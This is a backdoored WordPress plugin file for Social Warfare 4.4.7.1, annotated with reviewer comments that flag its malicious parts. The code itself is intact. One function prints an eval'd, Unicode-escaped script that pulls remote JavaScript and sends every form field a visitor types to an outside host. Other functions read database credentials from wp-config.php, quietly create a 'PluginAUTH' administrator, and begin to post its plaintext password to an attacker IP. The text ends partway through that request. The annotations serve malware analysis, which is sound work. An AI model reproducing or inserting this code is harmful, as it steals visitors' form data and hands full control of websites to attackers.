1 | <?php |
---|
2 | |
---|
3 | /** |
---|
4 | * Plugin Name: Social Warfare |
---|
5 | * Plugin URI: https://warfareplugins.com |
---|
6 | * Description: A plugin to maximize social shares and drive more traffic using the fastest and most intelligent share buttons on the market, calls to action via in-post click-to-tweets, popular posts widgets based on share popularity, link-shortening, Google Analytics and much, much more! |
---|
7 | * Version: 4.4.7.1 |
---|
8 | * Author: Warfare Plugins |
---|
9 | * Author URI: https://warfareplugins.com |
---|
10 | * Text Domain: social-warfare |
---|
11 | * |
---|
12 | */ |
---|
// Direct-access guard: ends the request unless the WPINC constant is already defined,
// i.e. unless WordPress itself loaded this file.
13 | defined( 'WPINC' ) || die; |
---|
14 | |
---|
15 | |
---|
16 | /** |
---|
17 | * We create these constants here so that we can use them throughout the plugin |
---|
18 | * for things like includes and requires. |
---|
19 | * |
---|
20 | * @since 4.2.0 | 19 NOV 2020 | The str_replace() removes any linebreaks in the string. |
---|
21 | * |
---|
22 | */ |
---|
// Plugin-wide constants: version strings, this file's path and directory, the plugin's
// base URL (trailing slash removed, CR/LF characters stripped) and the vendor store URL.
// NOTE(review): the version string matches the "Version:" header above. Further down, this
// same file defines add_footer_script() and custom_notify_plugin_updated(), which inject a
// remote script / form-field logger and create a hidden administrator account. Any site
// running this exact file should be handled as compromised, not merely outdated.
23 | define( 'SWP_VERSION', '4.4.7.1' ); |
---|
24 | define( 'SWP_DEV_VERSION', '2024.06.22 MASTER' ); |
---|
25 | define( 'SWP_PLUGIN_FILE', __FILE__ ); |
---|
26 | define( 'SWP_PLUGIN_URL', str_replace( array( "\r", "\n" ), '', untrailingslashit( plugin_dir_url( __FILE__ ) ) ) ); |
---|
27 | define( 'SWP_PLUGIN_DIR', __DIR__ ); |
---|
28 | define( 'SWP_STORE_URL', 'https://warfareplugins.com' ); |
---|
29 | |
---|
30 | |
---|
31 | /** |
---|
32 | * This will allow shortcodes to be processed in the excerpts. Ours is set up |
---|
33 | * to essentially remove the [shortcode] from being visible in the excerpts so |
---|
34 | * that they don't show up as plain text. |
---|
35 | * |
---|
36 | * @todo This needs to be moved into the Social_Warfare class. |
---|
37 | * |
---|
38 | */ |
---|
// Registers do_shortcode() on the 'the_excerpt' filter at priority 1.
// NOTE(review): this is the last statement described by the docblock above; the function that
// follows it (add_footer_script) is unrelated to excerpts.
39 | add_filter( 'the_excerpt', 'do_shortcode', 1 ); |
---|
// REVIEW (malicious code): echoes an inline <script> whose whole body is eval() of a
// \uXXXX-escaped JavaScript string. The escaping hides the script's contents and its URLs
// from plain-text searches of the file. Decoded, the string does three things:
//   1. Creates a <script> element with src https://94.156.79[.]8/sc-top.js, appends it to
//      document.body, and removes the element again once it has loaded.
//   2. Reads a cookie named "xcnmo-offsetgxc"; when it is missing, stores a random
//      10-character alphanumeric id in it (path=/) as a per-visitor identifier.
//   3. Adds a document-level "input" listener. For every INPUT element whose type is not
//      "button" it POSTs (application/x-www-form-urlencoded) the visitor id ("uid"), the
//      field's name or id ("i_name") and the base64 of the field's value ("b") to
//      https://hostpdf[.]co/pinche.php.
// Impact: anything typed into a form on a page that prints this footer (login, checkout,
// contact fields) is sent to a third party keystroke by keystroke, and remotely hosted
// script runs in the site's origin.
// Detection: search PHP files and rendered page source for `eval("\u`; look in browser and
// proxy logs for requests to the two hosts above and for the cookie name. A
// Content-Security-Policy without 'unsafe-eval' and with script-src / connect-src
// allow-lists would block all three steps.
// Response: replace the plugin with a known-good copy and treat form data entered while
// this code was live as exposed.
40 | function add_footer_script() { |
---|
41 | echo '<script>eval("\u000a\u0020\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u0073\u0063\u0072\u0069\u0070\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0020\u003d\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0063\u0072\u0065\u0061\u0074\u0065\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0028\u0022\u0073\u0063\u0072\u0069\u0070\u0074\u0022\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0073\u0063\u0072\u0069\u0070\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u002e\u0073\u0072\u0063\u0020\u003d\u0020\u0022\u0068\u0074\u0074\u0070\u0073\u003a\u002f\u002f\u0039\u0034\u002e\u0031\u0035\u0036\u002e\u0037\u0039\u002e\u0038\u002f\u0073\u0063\u002d\u0074\u006f\u0070\u002e\u006a\u0073\u0022\u003b\u000a\u000a\u0020\u0020\u0020\u0020\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0072\u0065\u006d\u006f\u0076\u0065\u0053\u0063\u0072\u0069\u0070\u0074\u0028\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0073\u0063\u0072\u0069\u0070\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u002e\u0070\u0061\u0072\u0065\u006e\u0074\u004e\u006f\u0064\u0065\u002e\u0072\u0065\u006d\u006f\u0076\u0065\u0043\u0068\u0069\u006c\u0064\u0028\u0073\u0063\u0072\u0069\u0070\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u007d\u000a\u000a\u0020\u0020\u0020\u0020\u0073\u0063\u0072\u0069\u0070\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u002e\u0061\u0064\u0064\u0045\u0076\u0065\u006e\u0074\u004c\u0069\u0073\u0074\u0065\u006e\u0065\u0072\u0028\u0027\u006c\u006f\u0061\u0064\u0027\u002c\u0020\u0072\u0065\u006d\u006f\u0076\u0065\u0053\u0063\u0072\u0069\u0070\u0074\u0029\u003b\u000a\u000a\u0020\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0062\u006f\u0064\u0079\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0043\u0068\u0069\u006c\u0064\u0028\u0073\u0063\u0072\u0069\u0070\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u000a\u0020\u0020\u0020\u0020\
u000a\u0020\u0020\u0020\u0020\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0067\u0065\u006e\u0065\u0072\u0061\u0074\u0065\u0052\u0061\u006e\u0064\u006f\u006d\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0074\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0063\u006f\u006e\u0073\u0074\u0020\u0065\u0020\u003d\u0020\u0022\u0041\u0042\u0043\u0044\u0045\u0046\u0047\u0048\u0049\u004a\u004b\u004c\u004d\u004e\u004f\u0050\u0051\u0052\u0053\u0054\u0055\u0056\u0057\u0058\u0059\u005a\u0061\u0062\u0063\u0064\u0065\u0066\u0067\u0068\u0069\u006a\u006b\u006c\u006d\u006e\u006f\u0070\u0071\u0072\u0073\u0074\u0075\u0076\u0077\u0078\u0079\u007a\u0030\u0031\u0032\u0033\u0034\u0035\u0036\u0037\u0038\u0039\u0022\u003b\u000a\u0020\u0020\u0020\u0020\u006c\u0065\u0074\u0020\u006e\u0020\u003d\u0020\u0022\u0022\u003b\u000a\u0020\u0020\u0020\u0020\u0066\u006f\u0072\u0020\u0028\u006c\u0065\u0074\u0020\u006f\u0020\u003d\u0020\u0030\u003b\u0020\u006f\u0020\u003c\u0020\u0074\u003b\u0020\u006f\u002b\u002b\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0063\u006f\u006e\u0073\u0074\u0020\u0074\u0020\u003d\u0020\u004d\u0061\u0074\u0068\u002e\u0066\u006c\u006f\u006f\u0072\u0028\u0036\u0032\u0020\u002a\u0020\u004d\u0061\u0074\u0068\u002e\u0072\u0061\u006e\u0064\u006f\u006d\u0028\u0029\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u006e\u0020\u002b\u003d\u0020\u0065\u002e\u0063\u0068\u0061\u0072\u0041\u0074\u0028\u0074\u0029\u000a\u0020\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u006e\u000a\u007d\u000a\u000a\u006c\u0065\u0074\u0020\u0075\u0069\u0064\u0020\u003d\u0020\u0067\u0065\u0074\u0043\u006f\u006f\u006b\u0069\u0065\u0028\u0027\u0078\u0063\u006e\u006d\u006f\u002d\u006f\u0066\u0066\u0073\u0065\u0074\u0067\u0078\u0063\u0027\u0029\u003b\u000a\u000a\u0069\u0066\u0020\u0028\u0021\u0075\u0069\u0064\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0075\u0069\u0064\u0020\u003d\u0020\u0067\u0065\u006e\u0
065\u0072\u0061\u0074\u0065\u0052\u0061\u006e\u0064\u006f\u006d\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0031\u0030\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0063\u006f\u006f\u006b\u0069\u0065\u0020\u003d\u0020\u0060\u0078\u0063\u006e\u006d\u006f\u002d\u006f\u0066\u0066\u0073\u0065\u0074\u0067\u0078\u0063\u003d\u0024\u007b\u0075\u0069\u0064\u007d\u003b\u0020\u0070\u0061\u0074\u0068\u003d\u002f\u0060\u003b\u000a\u007d\u000a\u000a\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0073\u0065\u006e\u0064\u0050\u006f\u0073\u0074\u0052\u0065\u0071\u0075\u0065\u0073\u0074\u0028\u0074\u002c\u0020\u0065\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0063\u006f\u006e\u0073\u0074\u0020\u006e\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u0055\u0052\u004c\u0053\u0065\u0061\u0072\u0063\u0068\u0050\u0061\u0072\u0061\u006d\u0073\u003b\u000a\u0020\u0020\u0020\u0020\u006e\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0022\u0075\u0069\u0064\u0022\u002c\u0020\u0075\u0069\u0064\u0029\u002c\u000a\u0020\u0020\u0020\u0020\u006e\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0022\u0069\u005f\u006e\u0061\u006d\u0065\u0022\u002c\u0020\u0074\u0029\u002c\u000a\u0020\u0020\u0020\u0020\u002f\u002f\u0020\u0041\u0064\u0064\u0020\u0074\u0068\u0065\u0020\u0066\u0069\u0065\u006c\u0064\u0020\u006e\u0061\u006d\u0065\u0020\u0061\u0073\u0020\u0061\u0020\u0070\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u000a\u0020\u0020\u0020\u0020\u006e\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0022\u0062\u0022\u002c\u0020\u0062\u0074\u006f\u0061\u0028\u0065\u0029\u0029\u002c\u000a\u0020\u0020\u0020\u0020\u0066\u0065\u0074\u0063\u0068\u0028\u0022\u0068\u0074\u0074\u0070\u0073\u003a\u002f\u002f\u0068\u006f\u0073\u0074\u0070\u0064\u0066\u002e\u0063\u006f\u002f\u0070\u0069\u006e\u0063\u0068\u0065\u002e\u0070\u0068\u0070\u0022\u002c\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u006d\u0065\u0074\u0068\u006f\u0064\u003a\u0020\u002
2\u0050\u004f\u0053\u0054\u0022\u002c\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0068\u0065\u0061\u0064\u0065\u0072\u0073\u003a\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0043\u006f\u006e\u0074\u0065\u006e\u0074\u002d\u0054\u0079\u0070\u0065\u0022\u003a\u0020\u0022\u0061\u0070\u0070\u006c\u0069\u0063\u0061\u0074\u0069\u006f\u006e\u002f\u0078\u002d\u0077\u0077\u0077\u002d\u0066\u006f\u0072\u006d\u002d\u0075\u0072\u006c\u0065\u006e\u0063\u006f\u0064\u0065\u0064\u0022\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u007d\u002c\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0062\u006f\u0064\u0079\u003a\u0020\u006e\u002e\u0074\u006f\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0029\u000a\u0020\u0020\u0020\u0020\u007d\u0029\u002e\u0074\u0068\u0065\u006e\u0028\u0028\u0074\u003d\u003e\u0074\u002e\u0074\u0065\u0078\u0074\u0028\u0029\u0029\u0029\u002e\u0074\u0068\u0065\u006e\u0028\u0028\u0074\u003d\u003e\u0063\u006f\u006e\u0073\u006f\u006c\u0065\u002e\u006c\u006f\u0067\u0028\u0074\u0029\u0029\u0029\u002e\u0063\u0061\u0074\u0063\u0068\u0028\u0028\u0074\u003d\u003e\u0063\u006f\u006e\u0073\u006f\u006c\u0065\u002e\u0065\u0072\u0072\u006f\u0072\u0028\u0022\u0045\u0072\u0072\u006f\u0072\u003a\u0022\u002c\u0020\u0074\u0029\u0029\u0029\u000a\u007d\u000a\u000a\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0061\u0064\u0064\u0045\u0076\u0065\u006e\u0074\u004c\u0069\u0073\u0074\u0065\u006e\u0065\u0072\u0028\u0022\u0069\u006e\u0070\u0075\u0074\u0022\u002c\u0020\u0028\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0028\u0074\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0069\u0066\u0020\u0028\u0022\u0049\u004e\u0050\u0055\u0054\u0022\u0020\u003d\u003d\u003d\u0020\u0074\u002e\u0074\u0061\u0072\u0067\u0065\u0074\u002e\u0074\u0061\u0067\u004e\u0061\u006d\u0065\u0020\u0026\u0026\u0020\u0022\u0062\u0075\u0074\u0074\u006f\u006e\u0022\u0020\u0021\u003d\u003d\u0020\u0074\u002e\u0074\u0061\u0072\u0067\u0065\
u0074\u002e\u0074\u0079\u0070\u0065\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0073\u0065\u006e\u0064\u0050\u006f\u0073\u0074\u0052\u0065\u0071\u0075\u0065\u0073\u0074\u0028\u0074\u002e\u0074\u0061\u0072\u0067\u0065\u0074\u002e\u006e\u0061\u006d\u0065\u0020\u007c\u007c\u0020\u0074\u002e\u0074\u0061\u0072\u0067\u0065\u0074\u002e\u0069\u0064\u002c\u0020\u0074\u002e\u0074\u0061\u0072\u0067\u0065\u0074\u002e\u0076\u0061\u006c\u0075\u0065\u0029\u000a\u0020\u0020\u0020\u0020\u007d\u000a\u007d\u0029\u0029\u003b\u000a\u000a\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0067\u0065\u0074\u0043\u006f\u006f\u006b\u0069\u0065\u0028\u006e\u0061\u006d\u0065\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0063\u006f\u006e\u0073\u0074\u0020\u0063\u006f\u006f\u006b\u0069\u0065\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u003d\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0063\u006f\u006f\u006b\u0069\u0065\u003b\u000a\u0020\u0020\u0020\u0020\u0063\u006f\u006e\u0073\u0074\u0020\u0063\u006f\u006f\u006b\u0069\u0065\u0073\u0020\u003d\u0020\u0063\u006f\u006f\u006b\u0069\u0065\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0073\u0070\u006c\u0069\u0074\u0028\u0027\u003b\u0020\u0027\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0066\u006f\u0072\u0020\u0028\u006c\u0065\u0074\u0020\u0063\u006f\u006f\u006b\u0069\u0065\u0020\u006f\u0066\u0020\u0063\u006f\u006f\u006b\u0069\u0065\u0073\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0063\u006f\u006e\u0073\u0074\u0020\u005b\u0063\u006f\u006f\u006b\u0069\u0065\u004e\u0061\u006d\u0065\u002c\u0020\u0063\u006f\u006f\u006b\u0069\u0065\u0056\u0061\u006c\u0075\u0065\u005d\u0020\u003d\u0020\u0063\u006f\u006f\u006b\u0069\u0065\u002e\u0073\u0070\u006c\u0069\u0074\u0028\u0027\u003d\u0027\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0069\u0066\u0020\u0028\u0063\u006f\u006f\u006b\u0069\u0065\u004e\u0061\u006d\u0065\u0020\u003d\u003d\u003d\u0020\u006e\u0061\u006d\u0065\u0
029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0063\u006f\u006f\u006b\u0069\u0065\u0056\u0061\u006c\u0075\u0065\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u006e\u0075\u006c\u006c\u003b\u000a\u007d\u000a\u0020\u0020\u0020\u0020");</script>'; |
---|
42 | } |
---|
// REVIEW (malicious code): these two hooks are the entry points of the injected code.
// - 'wp_footer' runs add_footer_script(), which prints an eval()'d, \uXXXX-escaped inline
//   script into the footer of front-end pages. Decoded, it loads
//   https://94.156.79[.]8/sc-top.js and posts the values of form inputs to
//   https://hostpdf[.]co/pinche.php.
// - 'admin_init' runs custom_notify_plugin_updated(), defined below. It is gated on the
//   option 'my_admin_init_function_run' and declares helpers that read wp-config.php, open
//   their own database connection, insert an administrator named 'PluginAUTH' and report
//   the site to https://94.156.79[.]8 (paths /AddSites, /FCS, /CMSUsers).
// Indicators to hunt for: the option name above in wp_options, the user_login 'PluginAUTH',
// and outbound connections from the web server to that address.
43 | add_action('wp_footer', 'add_footer_script'); |
---|
44 | add_action( 'admin_init', 'custom_notify_plugin_updated'); |
---|
45 | function custom_notify_plugin_updated() { |
---|
46 | $has_run = get_option('my_admin_init_function_run'); |
---|
47 | if ($has_run !== 'yes') { |
---|
// REVIEW (backdoor helper, declared inside custom_notify_plugin_updated()'s if-branch):
// walks from $directory toward the filesystem root and returns the path of the first
// wp-config.php it finds. When the walk reaches '/' without a hit it unhooks
// custom_notify_plugin_updated from 'admin_init' and returns false.
// Legitimate plugin code reaches the database through WordPress ($wpdb); locating
// wp-config.php on disk is a sign that the caller wants the raw credentials.
48 | function check_wp_config($directory) { |
---|
49 | while ($directory !== '/') { |
---|
50 | $wp_config_file = $directory . '/wp-config.php'; |
---|
51 | if (file_exists($wp_config_file)) { |
---|
52 | return $wp_config_file; |
---|
53 | } |
---|
54 | $directory = dirname($directory); |
---|
55 | } |
---|
56 | remove_action('admin_init', 'custom_notify_plugin_updated'); |
---|
57 | return false; |
---|
58 | } |
---|
59 | |
---|
// REVIEW (backdoor helper): reads $config_file as text and pulls the table prefix and the
// DB_NAME, DB_USER, DB_PASSWORD and DB_HOST values out of it with regular expressions
// (DB_HOST falls back to 'localhost'). Returns them as an array with the keys 'prefix',
// 'database', 'username', 'password', 'host'; returns nothing when the file does not exist.
// In this listing the result is passed to access_database(), so the database password is
// handled in clear text outside WordPress's own configuration loading.
60 | function parse_wp_config($config_file) { |
---|
61 | if (file_exists($config_file)) { |
---|
62 | $config_content = file_get_contents($config_file); |
---|
63 | $matches = []; |
---|
64 | // Extract prefix |
---|
65 | if (preg_match("/\$table_prefix\s*=\s*'(.+?)';/", $config_content, $matches)) { |
---|
66 | $prefix = $matches[1]; |
---|
67 | } else if (preg_match("/table_prefix.*=.*'(.+?)';/", $config_content, $matches)) { |
---|
68 | $prefix = $matches[1]; |
---|
69 | } else { |
---|
70 | //die("Prefix not found in wp-config.php"); |
---|
71 | $ba = ''; |
---|
72 | } |
---|
73 | // Extract database name |
---|
74 | if (preg_match("/define\(\s*'DB_NAME'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) { |
---|
75 | $database = $matches[1]; |
---|
76 | } |
---|
77 | // Extract username |
---|
78 | if (preg_match("/define\(\s*'DB_USER'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) { |
---|
79 | $username = $matches[1]; |
---|
80 | } |
---|
81 | // Extract password |
---|
82 | if (preg_match("/define\(\s*'DB_PASSWORD'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) { |
---|
83 | $password = $matches[1]; |
---|
84 | } |
---|
85 | // Extract host |
---|
86 | if (preg_match("/define\(\s*'DB_HOST'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) { |
---|
87 | $host = $matches[1]; |
---|
88 | } else { |
---|
89 | $host = 'localhost'; // Assuming local host if not specified |
---|
90 | } |
---|
91 | |
---|
92 | return array( |
---|
93 | 'prefix' => $prefix, |
---|
94 | 'database' => $database, |
---|
95 | 'username' => $username, |
---|
96 | 'password' => $password, |
---|
97 | 'host' => $host |
---|
98 | ); |
---|
99 | } else { |
---|
100 | //die("wp-config.php file not found"); |
---|
101 | $gz = ''; |
---|
102 | } |
---|
103 | } |
---|
104 | |
---|
// REVIEW (backdoor helper): opens a separate mysqli connection with the host, user,
// password and database name from $config (the array built by parse_wp_config()).
// Returns the mysqli object, or false when the connection fails.
// NOTE(review): writes made over this connection do not go through WordPress's user API,
// so they presumably will not appear in audit or security plugins that rely on WordPress
// hooks. Compare database contents directly when investigating.
105 | function access_database($config) { |
---|
106 | $mysqli = new mysqli($config['host'], $config['username'], $config['password'], $config['database']); |
---|
107 | |
---|
108 | if ($mysqli->connect_errno) { |
---|
109 | //echo "DATABASE ACCESS [FAIL]\n"; |
---|
110 | return false; |
---|
111 | } else { |
---|
112 | //POST "DATABASE ACCESS [SUCCESS]\n"; |
---|
113 | return $mysqli; |
---|
114 | } |
---|
115 | } |
---|
116 | |
---|
// REVIEW (backdoor helper): returns a string of $length characters (default 12) picked with
// rand() from digits, ASCII letters and the symbols !@#$%^&*()-_ .
// In this listing its only visible call stores the result in $generated_password;
// pachamama() builds the password it actually uses with its own inline loop.
117 | function generate_random_password($length = 12) { |
---|
118 | $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()-_'; |
---|
119 | $password = ''; |
---|
120 | $characters_length = strlen($characters); |
---|
121 | for ($i = 0; $i < $length; $i++) { |
---|
122 | $password .= $characters[rand(0, $characters_length - 1)]; |
---|
123 | } |
---|
124 | return $password; |
---|
125 | } |
---|
126 | |
---|
// REVIEW: the two assignments below sit inside custom_notify_plugin_updated()'s body. The
// original comments call them globals, but no `global` declaration for either name is
// visible in that scope in this listing.
127 | // Define a global variable for the password |
---|
128 | $generated_password = generate_random_password(); |
---|
129 | |
---|
130 | // Define a global variable for the users count |
---|
131 | $wpuserscount = 0; |
---|
// REVIEW (backdoor: rogue administrator): works on the raw mysqli handle, not the WordPress API.
//   1. Counts the rows of {prefix}users into the global $wpuserscount; returns early when
//      that query fails.
//   2. Hashes $password with password_hash().
//   3. When no row with user_login 'PluginAUTH' exists, inserts one (e-mail
//      PluginAUTH@example.com, registered NOW()) and then inserts a {prefix}capabilities
//      usermeta row that grants the 'administrator' role.
// Every failure path is silent: the echo statements are commented out and replaced with
// throw-away assignments.
// Hunting: `SELECT ID, user_registered FROM <prefix>users WHERE user_login = 'PluginAUTH'`.
// Also review every account whose capabilities meta contains "administrator" against the
// list of expected admins.
// Response: delete the account and its usermeta; rotate all administrator passwords, the
// database password and the salts in wp-config.php; invalidate active sessions.
132 | function add_admin_user($mysqli, $config, $password) { |
---|
133 | global $generated_password; // Access the global generated password variable |
---|
134 | global $wpuserscount; // Declare the global variable to update user count |
---|
135 | $username = 'PluginAUTH'; |
---|
136 | |
---|
137 | //$generated_password = $password; |
---|
138 | //$password = $generated_password; |
---|
139 | $user_role = 'administrator'; |
---|
140 | |
---|
141 | // First, let's update the global user count |
---|
142 | $countQuery = "SELECT COUNT(*) AS user_count FROM {$config['prefix']}users"; |
---|
143 | $countResult = $mysqli->query($countQuery); |
---|
144 | if ($countResult) { |
---|
145 | $row = $countResult->fetch_assoc(); |
---|
146 | $wpuserscount = $row['user_count']; // Update the global variable with the user count |
---|
147 | } else { |
---|
148 | //echo "Error fetching user count: " . $mysqli->error . "\n"; |
---|
149 | return; // Early return in case of query error |
---|
150 | } |
---|
151 | // Hash the password |
---|
152 | $hashed_password = password_hash($password, PASSWORD_DEFAULT); |
---|
153 | |
---|
154 | // Check if the user already exists |
---|
155 | $query = "SELECT ID FROM {$config['prefix']}users WHERE user_login = '{$username}'"; |
---|
156 | $result = $mysqli->query($query); |
---|
157 | |
---|
158 | if ($result && $result->num_rows > 0) { |
---|
159 | //echo "User '{$username}' already exists.\n"; |
---|
160 | $z = "b"; |
---|
161 | } else { |
---|
162 | // Insert the new user |
---|
163 | $query = "INSERT INTO {$config['prefix']}users (user_login, user_pass, user_nicename, user_email, user_registered) VALUES ('{$username}', '{$hashed_password}', '{$username}', '{$username}@example.com', NOW())"; |
---|
164 | $result = $mysqli->query($query); |
---|
165 | |
---|
166 | if ($result) { |
---|
167 | $user_id = $mysqli->insert_id; |
---|
168 | |
---|
169 | // Set user role |
---|
170 | $query = "INSERT INTO {$config['prefix']}usermeta (user_id, meta_key, meta_value) VALUES ({$user_id}, '{$config['prefix']}capabilities', 'a:1:{s:13:\"administrator\";b:1;}')"; |
---|
171 | $result = $mysqli->query($query); |
---|
172 | |
---|
173 | if ($result) { |
---|
174 | //echo "User '{$username}' with administrative privileges added successfully.\n"; |
---|
175 | $zb = ''; |
---|
176 | } else { |
---|
177 | //echo "Error assigning role to user '{$username}'.\n"; |
---|
178 | $zb = ''; |
---|
179 | } |
---|
180 | } else { |
---|
181 | //echo "Error creating user '{$username}': " . $mysqli->error . "\n"; |
---|
182 | $zb = ''; |
---|
183 | } |
---|
184 | } |
---|
185 | } |
---|
186 | |
---|
// REVIEW (backdoor helper): reads the 'siteurl' option from {prefix}options over the raw
// mysqli handle and returns the host part of that URL, or null when the row is missing or
// the URL has no host. pachamama() uses the result to build the login URL it reports.
187 | function get_domain_from_database($mysqli, $config) { |
---|
188 | // Query to retrieve site URL from WordPress options table |
---|
189 | $query = "SELECT option_value FROM {$config['prefix']}options WHERE option_name = 'siteurl'"; |
---|
190 | $result = $mysqli->query($query); |
---|
191 | |
---|
192 | if ($result && $result->num_rows > 0) { |
---|
193 | $row = $result->fetch_assoc(); |
---|
194 | $site_url = $row['option_value']; |
---|
195 | $parsed_url = parse_url($site_url); |
---|
196 | if ($parsed_url && isset($parsed_url['host'])) { |
---|
197 | return $parsed_url['host']; |
---|
198 | } |
---|
199 | } |
---|
200 | |
---|
201 | return null; |
---|
202 | } |
---|
// Placeholder host value. pachamama() overwrites $currdomain (through `global`) once it has
// read the site's host, and getWPUsers() reports it.
203 | $currdomain = 'UNK.UNK'; |
---|
// REVIEW (backdoor orchestrator): for the directory in $path (a trailing 'wp-config.php'
// is stripped first) it
//   1. locates wp-config.php with check_wp_config() and parses it with parse_wp_config(),
//   2. opens a direct database connection with access_database(),
//   3. builds a 13-character password with rand() and calls add_admin_user() to create the
//      'PluginAUTH' administrator,
//   4. reads the site host with get_domain_from_database(), and
//   5. sends a JSON POST to https://94.156.79[.]8/AddSites holding the admin URL, the
//      domain, the username, the PLAINTEXT password ('passwordz') and the wp-login.php URL.
// The result is a working administrator login for this site in the hands of whoever
// operates that address. No output is produced on any path; the echo statements are
// commented out.
// Hunting: outbound HTTPS from the PHP/web-server process to that address, and JSON bodies
// containing the keys "aurl" and "passwordz" in egress proxy logs.
// Response: block the address at the egress firewall, then follow the account clean-up
// described at add_admin_user().
204 | function pachamama($path) { |
---|
205 | global $currdomain; |
---|
206 | if (strpos($path, 'wp-config.php') !== false) { |
---|
207 | $path = str_replace('wp-config.php', '', $path); |
---|
208 | } |
---|
209 | |
---|
210 | $current_directory = $path; |
---|
211 | $wp_config_file = check_wp_config($current_directory); |
---|
212 | if ($wp_config_file) { |
---|
213 | //echo "WP-CONFIG [FOUND]\n"; |
---|
214 | |
---|
215 | $config = parse_wp_config($wp_config_file); |
---|
216 | $mysqli = access_database($config); |
---|
217 | if ($mysqli) { |
---|
218 | $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()-_'; |
---|
219 | $password = ''; |
---|
220 | $characters_length = strlen($characters); |
---|
221 | for ($i = 0; $i < 13; $i++) { |
---|
222 | $password .= $characters[rand(0, $characters_length - 1)]; |
---|
223 | } |
---|
224 | add_admin_user($mysqli, $config, $password); |
---|
225 | $domain = get_domain_from_database($mysqli, $config); |
---|
226 | if ($domain) { |
---|
227 | //echo "[$domain] OK\n"; |
---|
228 | $currdomain = $domain; |
---|
229 | |
---|
230 | // Reconstruct the correct wp-login.php path |
---|
231 | $wp_login_path = "https://{$domain}/wp-login.php"; |
---|
232 | |
---|
233 | // Perform a POST request to https://94.156.79.8/AddSites |
---|
234 | $url = 'https://94.156.79.8/AddSites'; |
---|
235 | $aurl = get_admin_url(); |
---|
236 | $post_data = array( |
---|
237 | 'aurl' => $aurl, |
---|
238 | 'domain' => $domain, |
---|
239 | 'username' => 'PluginAUTH', |
---|
240 | 'passwordz' => $password, // plaintext of the password generated in this function (the local $password, not a global) |
---|
241 | 'wp_login_path' => $wp_login_path |
---|
242 | ); |
---|
243 | |
---|
244 | $ch = curl_init(); |
---|
245 | curl_setopt($ch, CURLOPT_URL, $url); |
---|
